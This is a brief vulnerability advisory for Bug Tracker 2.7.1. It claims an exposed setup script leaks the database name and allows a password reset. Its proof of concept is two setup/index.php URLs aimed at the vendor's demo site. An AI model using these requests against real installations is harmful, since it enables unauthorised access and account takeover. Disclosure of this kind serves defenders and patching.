Bug Tracker version 2.7.1 suffers from a database name and credential disclosure vulnerability.
2d5b24ff4d2e81970bc492b19b1b88a44529e2a4d367d8030d76ee01fe5d56ca
========================================================================
| # Title : Bug Tracker V 2.7.1 database disclosure vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on: windows 8.1 Français V.(Pro)
| # Vendor : https://www.twbsd.org/demo/
========================================================================
Drok : "Wang, Chun-Pin All rights reserved."
poc :
To know the name of the database :
https://www.twbsd.org/demo/setup/index.php?step=2&next=Next+Step+%3E+%3E
Reset Password :
https://www.twbsd.org/demo/setup/index.php?step=4&next=Next+Step+%3E+%3E
Greetz :
jericho http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com * Larry W. Cashdollar*
Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be *
---------------------------------------------------------------------------------------------------------------